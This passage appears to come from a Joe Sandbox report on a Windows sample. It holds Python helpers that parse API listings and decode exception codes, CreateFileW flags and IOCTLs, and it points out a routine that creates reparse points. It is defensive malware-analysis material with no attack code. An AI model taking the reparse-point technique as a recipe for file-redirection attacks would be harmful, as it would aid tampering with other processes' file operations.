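ERROR_INVALID_PARAMETER = 87     # Win32 error 0x57

# "• Name.MODULE(args) ..." with an optional "Part of subcall function XXXX:" prefix
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"([A-Za-z_@0-9]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?")
ID_RE = re.compile(r"•\s*(Opcode|Instruction) ID:\s*([0-9a-f]{64})")


def decode_exception_code(code):
    """Split an NTSTATUS-style exception code into its fields.

    Bits 31-30 carry the severity (3 = error), bits 27-16 the facility and
    bits 15-0 the embedded Win32 error code.
    """
    facility = (code >> 16) & 0x0FFF
    return {
        "severity": code >> 30,
        "facility": facility,
        "win32_error": code & 0xFFFF,
        "is_vcpp": facility == FACILITY_VISUALCPP,
    }


def parse_entries(text):
    """Parse 'APIs' blocks into dicts of called APIs, raised codes and IDs."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "raise_codes": [], "opcode_id": None, "instruction_id": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            name, module, args = m.groups()
            cur["apis"].append(f"{module}!{name}")
            if name == "RaiseException" and args:
                # first argument is the exception code, printed in hex by the report
                cur["raise_codes"].append(int(args.split(",")[0], 16))
            continue
        m = ID_RE.match(line)
        if m:
            cur[m.group(1).lower() + "_id"] = m.group(2)
    return entries


def delay_load_exception_codes(entries):
    """Exception codes raised on the MSVC delay-load helper path."""
    codes = set()
    for e in entries:
        if any(a.endswith("!___delayLoadHelper2@8") for a in e["apis"]):
            codes.update(e["raise_codes"])
    return codes


def shared_instruction_ids(entries):
    """Instruction IDs shared by several functions: near-identical code that
    differs only in its Opcode ID (here, the per-import delay-load thunks)."""
    groups = defaultdict(list)
    for e in entries:
        if e["instruction_id"]:
            groups[e["instruction_id"]].append(e["opcode_id"])
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for code in sorted(delay_load_exception_codes(parsed)):
        print(f"{code:08X} -> {decode_exception_code(code)}")
    for iid, opcodes in shared_instruction_ids(parsed).items():
        print(f"Instruction ID {iid[:12]}... shared by {len(opcodes)} functions")
```

                                         Running it on the excerpt reports C06D0057 as a VcppException carrying ERROR_INVALID_PARAMETER and shows the two delay-load entries collapsing onto one Instruction ID, while the SetDlgItemTextW function stands alone. Grouping by Instruction ID rather than Opcode ID is the useful view here: the Opcode ID changes with every import-specific thunk, the Instruction ID does not.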
                                        APIs
                                        • SetDlgItemTextW.USER32(?,?,?), ref: 00271DFC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemText
                                        • String ID:
                                        • API String ID: 3367045223-0
                                        • Opcode ID: c231d5a8f14eef96c4f434cd1df85e485685c6dc047c26db3e774848381ebec4
                                        • Instruction ID: ce9fbe84e4611742771707c3f10a9faf5aaeba25b1b3011ef8517d35b3166d4f
                                        • Opcode Fuzzy Hash: c231d5a8f14eef96c4f434cd1df85e485685c6dc047c26db3e774848381ebec4
                                        • Instruction Fuzzy Hash: 32C00231518200FFCB05CF58E948E1ABBBAFF96311B51C558F06886030C371D920DF62
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,0027D115,?,?,?,?,?,?,?), ref: 0027E8DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: 4b330638608d944c369b0f65239022981d548edda6a849393921abf9cd439c8a
                                        • Instruction ID: 53840edd56892a7e550fa6ffa331ea7859ef15a2d432728472cc898667245527
                                        • Opcode Fuzzy Hash: 4b330638608d944c369b0f65239022981d548edda6a849393921abf9cd439c8a
                                        • Instruction Fuzzy Hash: EEA00230201109CBDB411F31EE0D70E7B6ABF426D9729C0A8A409C9071DF27CCA3EA41
                                        APIs
                                        • CloseHandle.KERNELBASE(?,?,00000001,0027DE10,D946AC94,?,00000000,002A93B1,000000FF,?,0027BEA6,?), ref: 0027DE6B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 84052aead9291677ad511e7c210355793fa3305971d920cb23b8f7599ad7f995
                                        • Instruction ID: f7db0061d22735b639a83e38fa9e3a1759288614ed8facc7e35b8921a4e99354
                                        • Opcode Fuzzy Hash: 84052aead9291677ad511e7c210355793fa3305971d920cb23b8f7599ad7f995
                                        • Instruction Fuzzy Hash: D8F08270461B039BD7359E24D414392B6F46F21334F04CB1DD1EA465E4C770A9A99A51
                                        APIs
                                        • _wcslen.LIBCMT ref: 00279CB1
                                          • Part of subcall function 0027AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0027AC2E
                                          • Part of subcall function 0027AC11: GetLastError.KERNEL32 ref: 0027AC72
                                          • Part of subcall function 0027AC11: CloseHandle.KERNEL32(?), ref: 0027AC81
                                          • Part of subcall function 00272F45: _wcslen.LIBCMT ref: 00272F50
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00279EE1
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 00279F1E
                                        • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0027A0BF
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0027A127
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A134
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A14A
                                        • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A18E
                                        • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3517300771-3508440684
                                        • Opcode ID: 1ba37ee0820ebb9a2ac0ee5d5374260c1a6beaaf3321ad808f6da360a04e84f8
                                        • Instruction ID: 16c311f833b66b1efacc4708dcb2c4bd7cf254afc3e612928a0e3de5593fc904
                                        • Opcode Fuzzy Hash: 1ba37ee0820ebb9a2ac0ee5d5374260c1a6beaaf3321ad808f6da360a04e84f8
                                        • Instruction Fuzzy Hash: 173280719203899FDF24DFA8CC85BEE77B8AF19310F108159E94DE7281DB349A58CB61
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0029163A
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002916BB
                                        • EndDialog.USER32(?,00000006), ref: 002916CE
                                        • GetDlgItem.USER32(?,0000006C), ref: 002916EA
                                        • SetFocus.USER32(00000000), ref: 002916F1
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 00271DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00271DFC
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00291763
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00291783
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00291826
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002918AD
                                          • Part of subcall function 00271150: _wcslen.LIBCMT ref: 0027115B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                        • String ID: %s %s$REPLACEFILEDLG
                                        • API String ID: 485132379-439456425
                                        • Opcode ID: 0e4ea5a1a34d7b0e8c2c555c3a2d1e4ffc19711fde9f9e2baffff55d73f52e1b
                                        • Instruction ID: 0ced29d00111c20e5a039f9da855c6fcf01719c753cf3794435d2036b521d2f0
                                        • Opcode Fuzzy Hash: 0e4ea5a1a34d7b0e8c2c555c3a2d1e4ffc19711fde9f9e2baffff55d73f52e1b
                                        • Instruction Fuzzy Hash: DFA18E71921219ABEF25EBA4CD4AFEEB77DAF05300F0081D5B209A6182DA715F74CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 9f3005e02fa71b01a5a4d24eb47663b08d634ad39129fd4693ea8ef0646f8fc7
                                        • Instruction ID: 8f45cd37a03ed71a457df27f104f19bbf48162bc2aef988cb9b6ef7f92c16c42
                                        • Opcode Fuzzy Hash: 9f3005e02fa71b01a5a4d24eb47663b08d634ad39129fd4693ea8ef0646f8fc7
                                        • Instruction Fuzzy Hash: 81C25E71E246298FDF25DE28DD407EAB3B5EB85305F1441EAD80DE7241EB74AE918F40
                                        APIs
                                        • _strlen.LIBCMT ref: 0027438C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00274523
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 2172594012-2756464174
                                        • Opcode ID: 7b377515b5220640bd8cafb5b6344231114e5082db6caaec40023d126e41d1e1
                                        • Instruction ID: 0ab4673d537117d98c5d35f230eba56dff323b41acf8d6da2ef64dfee67f161b
                                        • Opcode Fuzzy Hash: 7b377515b5220640bd8cafb5b6344231114e5082db6caaec40023d126e41d1e1
                                        • Instruction Fuzzy Hash: AD72F471A203458FCF18EF68C8957EA7BA4BF15300F08857DEC5A9B282DB749964CF61
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00296884
                                        • IsDebuggerPresent.KERNEL32 ref: 00296950
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00296970
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0029697A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: fe3e657dc92d24025a8f20dc2a3e5e412b24ecd003c6c1740fb19d9a18e10070
                                        • Instruction ID: aecb83d45ead61ac6b48e372bdc7c0f969d85b660955ba327b77a286d5e02097
                                        • Opcode Fuzzy Hash: fe3e657dc92d24025a8f20dc2a3e5e412b24ecd003c6c1740fb19d9a18e10070
                                        • Instruction Fuzzy Hash: 943114B5D553199BDF21DFA4D989BCCBBF8BF08300F1040AAE40CAB250EB719A848F44
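Added example (editor's code, not part of the Joe Sandbox report and not code from the sample): a small decoder for the raw argument values in listings like the CreateFileW/DeviceIoControl entry earlier on this page (refs 00279EE1 to 0027A196) and the IsProcessorFeaturePresent/IsDebuggerPresent entry just above (refs 00296884 to 0029697A). The constants are the Windows SDK definitions: 40000000 is GENERIC_WRITE, C0000000 is GENERIC_READ|GENERIC_WRITE, 02200000 is FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, and the DeviceIoControl code 000900A4 decomposes as CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, access 0), which is FSCTL_SET_REPARSE_POINT. Read together with the SeCreateSymbolicLinkPrivilege and SeRestorePrivilege strings, that entry is a routine that creates a file or directory, reopens it with FILE_FLAG_OPEN_REPARSE_POINT, writes reparse data, and removes the target again if that fails; a reparse point written by a dropper is worth checking because later file operations of other processes follow it. The second helper encodes a caveat for the entry above: IsDebuggerPresent next to SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter, with or without a preceding IsProcessorFeaturePresent(0x17, PF_FASTFAIL_AVAILABLE), is the MSVC CRT's fast-fail reporting code, so these two functions are not by themselves evidence of a hand-written anti-debugging check. The sample listings are copied from this page; string arguments are unquoted in the listing, so the comma split turns any string containing a comma into several unresolved entries.

```python
# Added example, not code from the report: decodes the raw Win32 argument values
# in a Joe Sandbox style API listing.  Constants are Windows SDK definitions; the
# two sample listings are copied from entries on this page ('?' = unresolved).
import re

# CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
#             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_AND_ATTRS = {0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
                   0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
# DeviceIoControl: CTL_CODE(DeviceType, Function, Method, Access)
#   = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {0x7: "FILE_DEVICE_DISK", 0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
KNOWN_CODES = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}
# "Api.MODULE(args), ref: ADDR"; a call listed without arguments reads "Api.MODULE ref: ADDR"
API_LINE = re.compile(r"(\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]+)")

REPARSE_ENTRY = r"""
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00279EE1
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0027A0BF
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0027A127
• RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,D946B7DC,002A9937,000000FF), ref: 0027A18E
"""
CRT_ENTRY = r"""
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00296884
• IsDebuggerPresent.KERNEL32 ref: 00296950
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00296970
• UnhandledExceptionFilter.KERNEL32(?), ref: 0029697A
"""

def parse_args(text):
    """Hex arguments -> unsigned 32-bit ints; '?' and (unquoted) string arguments -> None."""
    out = []
    for raw in (text.split(",") if text else []):
        try:
            out.append(int(raw.strip(), 16) & 0xFFFFFFFF)  # "-00000008" is a negative literal
        except ValueError:
            out.append(None)
    return out

def calls(listing):
    """Yield (api, args, ref) for each API line; lines that are not calls are skipped."""
    for m in filter(None, map(API_LINE.search, listing.splitlines())):
        yield m.group(1), parse_args(m.group(3) or ""), m.group(4)

def expand_flags(value, table):
    """Name the bits of a mask from *table*, highest bit first; leftover bits stay hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if (value & bit) == bit]
    rest = value & ~sum(bit for bit in table if (value & bit) == bit)
    return (names + [hex(rest)] if rest else names) or ["0"]

def decode_ioctl(code):
    """Split a CTL_CODE into its fields and name it when it is a known FSCTL."""
    return {"device": DEVICE_TYPES.get(code >> 16, hex(code >> 16)), "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": METHODS[code & 0x3],
            "name": KNOWN_CODES.get(code, "unknown")}

def describe(api, args, ref):
    """One readable line per call, numeric arguments resolved to their SDK names."""
    def fmt(value, table):
        return "?" if value is None else "|".join(expand_flags(value, table))
    if api == "CreateFileW" and len(args) >= 6:
        _, access, share, _, creation, flags = args[:6]
        return (f"{ref}: CreateFileW access={fmt(access, GENERIC_ACCESS)} share={fmt(share, SHARE_MODE)} "
                f"creation={CREATION.get(creation, '?')} flags={fmt(flags, FLAGS_AND_ATTRS)}")
    if api == "DeviceIoControl" and len(args) >= 2 and args[1] is not None:
        d = decode_ioctl(args[1])
        return f"{ref}: DeviceIoControl {d['name']} ({d['device']}, function {d['function']}, {d['method']})"
    return f"{ref}: {api}"

def summarize(listing):
    return [describe(*call) for call in calls(listing)]

def sets_reparse_point(listing):
    """True when a handle opened with FILE_FLAG_OPEN_REPARSE_POINT is then given to
    FSCTL_SET_REPARSE_POINT, i.e. the function writes a symlink, junction or mount point."""
    opened = False
    for api, args, _ in calls(listing):
        if api == "CreateFileW" and len(args) >= 6 and args[5] is not None and args[5] & 0x00200000:
            opened = True
        elif api == "DeviceIoControl" and opened and len(args) >= 2 and args[1] == 0x000900A4:
            return True
    return False

def looks_like_crt_securityfailure(listing):
    """IsDebuggerPresent + SetUnhandledExceptionFilter(NULL) + UnhandledExceptionFilter, optionally
    after IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE = 0x17), is the MSVC CRT's fast-fail
    reporting path (__report_gsfailure and friends), not a hand-written anti-debug check.
    Assumption: *listing* covers a single function, as each entry on this page does."""
    seen = {api: args for api, args, _ in calls(listing)}
    return ("IsDebuggerPresent" in seen and "UnhandledExceptionFilter" in seen
            and (seen.get("SetUnhandledExceptionFilter") or [None])[0] == 0)
```

summarize(REPARSE_ENTRY) renders the four calls as "00279EE1: CreateFileW access=GENERIC_WRITE share=0 creation=CREATE_NEW flags=FILE_ATTRIBUTE_NORMAL", then the reopen with OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, then "DeviceIoControl FSCTL_SET_REPARSE_POINT (FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED)", and sets_reparse_point() is the yes/no check for that pattern. Pointer arguments (lpFileName, the reparse buffer) are unresolved in a static listing, so the link target itself has to come from the dynamic file-system trace, not from these lines.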
                                        APIs
                                        • GetLastError.KERNEL32(?,?,0027952D,?,00000040,0027931E,00000001,?,?,?,?,0000001C,00287618,002BE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00279330
                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0027952D,?,00000040,0027931E,00000001,?,?), ref: 00279351
                                        • _wcslen.LIBCMT ref: 00279360
                                        • LocalFree.KERNEL32(00000000,00000000,00000000,002BE0C8,?,?,0027952D,?,00000040,0027931E,00000001,?,?,?,?,0000001C), ref: 00279373
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                        • String ID:
                                        • API String ID: 991192900-0
                                        • Opcode ID: 456838714ccd68fd3104578fd95a03466b8d3388c986feeebc512bc3c1158438
                                        • Instruction ID: 02d3b78b260e69cca2819ae4d426417d503dc850a1322316bfbad5dde653ff3b
                                        • Opcode Fuzzy Hash: 456838714ccd68fd3104578fd95a03466b8d3388c986feeebc512bc3c1158438
                                        • Instruction Fuzzy Hash: 92F08275520205FBEB049BA19D05EFF77BCAF86750B208059F506A6190CE709E119A74
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,00294D59,0000001C,00294F4E,00000000,?,?,?,?,?,?,?,00294D59,00000004,002C5D84,00294FDE), ref: 00294E25
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00294D59,00000004,002C5D84,00294FDE), ref: 00294E40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 03d70fa99e3d184e8ad2d45f49573b1d164783514c6c2dc9b9f9beab42fdc0a6
                                        • Instruction ID: d293d1490bb931c54f30cccfa25a78bab184adc5b474e47706cc388cda20e18d
                                        • Opcode Fuzzy Hash: 03d70fa99e3d184e8ad2d45f49573b1d164783514c6c2dc9b9f9beab42fdc0a6
                                        • Instruction Fuzzy Hash: E401F732B101096BCF14EE29DC05FEE7BA9AFC4328F0CC125EE59DB254DB34D8128680
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0029535E), ref: 0029ABBC
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0029535E), ref: 0029ABC6
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0029535E), ref: 0029ABD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: c49d0f90227ae5ae537f52a45c31fe0291edc062dc532321073d32079da1b0b1
